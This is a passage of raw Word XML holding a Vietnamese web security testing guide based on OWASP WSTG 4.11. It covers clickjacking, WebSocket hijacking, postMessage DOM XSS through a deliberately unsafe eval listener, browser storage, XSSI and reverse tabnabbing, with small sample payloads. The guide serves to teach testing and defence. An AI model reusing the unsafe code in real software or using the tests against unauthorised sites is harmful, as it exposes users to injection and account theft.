        <w:lastRenderedPageBreak/>
        <w:t>&lt;iframe src="[http://target.com/sensitive-page](http://target.com/sensitive-page)" style="opacity: 0.5; width: 100%; height: 500px;"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9B894C" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve">Mở file này. Nếu trang mục tiêu hiện ra trong khung -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lỗi</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEF152E" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.11.10 Testing WebSockets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0C671F" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mã WSTG:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> WSTG-CLNT-10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DCC8D6" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Mục tiêu kiểm thử</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52117289" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:t>Kiểm tra bảo mật của kênh giao tiếp WebSocket (ws:// hoặc wss://).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0263E5D6" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Kỹ thuật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D750414" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CSWSH (Cross-Site WebSocket Hijacking):</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> Tương tự CSRF. Nếu quá trình bắt tay (Handshake) WebSocket không kiểm tra header Origin, hacker có thể kết nối đến WebSocket của nạn nhân từ trang web giả mạo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2A5C18" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Input Validation:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> Dữ liệu gửi qua WebSocket cũng cần được kiểm tra SQLi, XSS như HTTP thường.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1BD39D" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Lab Thực hành: CSWSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F923881" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Công cụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178E7A1E" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Bắt request nâng cấp WebSocket (Upgrade request).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEF8ECA" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Gửi sang Repeater.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3445B692" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Đổi header Origin thành http://hacker.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7179DB0C" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve">Nếu kết nối vẫn thành công (HTTP 101 Switching Protocols) -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lỗi</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD55DA8" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.11.11 Testing Web Messaging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1676F171" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mã WSTG:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> WSTG-CLNT-11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1935D1" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Mục tiêu kiểm thử</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3294DB" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:t>Kiểm tra việc sử dụng postMessage() trong HTML5 để giao tiếp giữa các cửa sổ/iframe khác domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158547D7" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Lý thuyết &amp; Kỹ thuật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3521B203" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lỗi nhận (Receive):</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> window.addEventListener("message", ...) không kiểm tra event.origin đến từ đâu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B6EBB0" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lỗi gửi (Send):</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> window.postMessage(data, "*"). Dấu * nghĩa là gửi data cho bất kỳ ai đang nghe (Wildcard target origin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7CAD88" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Ví dụ Minh họa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661A1824" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:lastRenderedPageBreak/>
        <w:t>Trang A nhận message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121CFFD6" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>window.addEventListener("message", function(e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8F77A6" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve">    eval(e.data); // Nguy hiểm!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EE2361" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CFEE51" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Hacker nhúng trang A vào iframe và gửi message: iframe.contentWindow.postMessage("alert(1)", "*"). -&gt; DOM XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F68E78" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.11.12 Testing Browser Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC43A6F" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mã WSTG:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> WSTG-CLNT-12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C026794" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Mục tiêu kiểm thử</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434C6109" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:t>Kiểm tra LocalStorage, SessionStorage, IndexedDB, và WebSQL xem có chứa dữ liệu nhạy cảm không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64336458" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Rủi ro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229D6826" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Dữ liệu trong LocalStorage tồn tại vĩnh viễn (cho đến khi xóa) và dễ dàng bị đánh cắp bởi XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB14E07" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Không nên lưu: Token đăng nhập (nếu không có cơ chế bảo vệ), thông tin thẻ tín dụng, PII.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0B1C50" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Lab Thực hành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414A04A0" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>F12 -&gt; Application -&gt; Storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA0469D" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Duyệt qua các mục Local/Session Storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C1E2BB" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Tìm kiếm các key như token, user, pass, auth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7323F6C6" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.11.13 Testing for Cross Site Script Inclusion (XSSI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BEF7C6" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mã WSTG:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> WSTG-CLNT-13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A344BDC" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Mục tiêu kiểm thử</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534F0419" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:t>Tấn công vào các file JavaScript được sinh động (dynamic JS) hoặc JSONP để đánh cắp dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195D105F" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Nguyên lý</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2249C576" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Thẻ &lt;script src="..."&gt; không bị chặn bởi SOP (Same Origin Policy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0328F525" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Nếu file JS chứa dữ liệu riêng tư (VD: var userInfo = {"id": 1, "balance": 100};), trang web của hacker có thể load file này và đọc biến userInfo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55514589" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.11.14 Testing for Reverse Tabnabbing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E58259" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mã WSTG:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> WSTG-CLNT-14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C65830" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Mục tiêu kiểm thử</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28320AB2" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:t>Kiểm tra các liên kết mở ra tab mới (target="_blank").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D11FAA" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Lý thuyết &amp; Kỹ thuật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB87DCC" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Khi trang A mở trang B bằng target="_blank", trang B có quyền truy cập window.opener (chính là đối tượng window của trang A).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBEC80F" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Trang B (nếu độc hại) có thể chuyển hướng trang A sang trang Login giả mạo: window.opener.location = "http://fake-login.com".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550DD631" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phòng chống:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> Thêm rel="noopener noreferrer".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDF01A0" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Lab Thực hành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4E1937" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Tìm các link ngoại vi (external links).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2A0E65" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Inspect Element (F12).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17773A78" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Nếu thấy target="_blank" mà thiếu rel="noopener", đó là lỗi Reverse Tabnabbing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540AD826" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TÀI LIỆU THAM KHẢO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F12F961" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OWASP WSTG v4.2 - Chapter 4.11</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:tooltip="null" w:history="1">
        <w:r w:rsidRPr="000A154C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Link OWASP</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55F5D454" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DOM XSS Prevention Cheat Sheet</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t>: Hướng dẫn lập trình an toàn để tránh DOM XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DF8F67" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
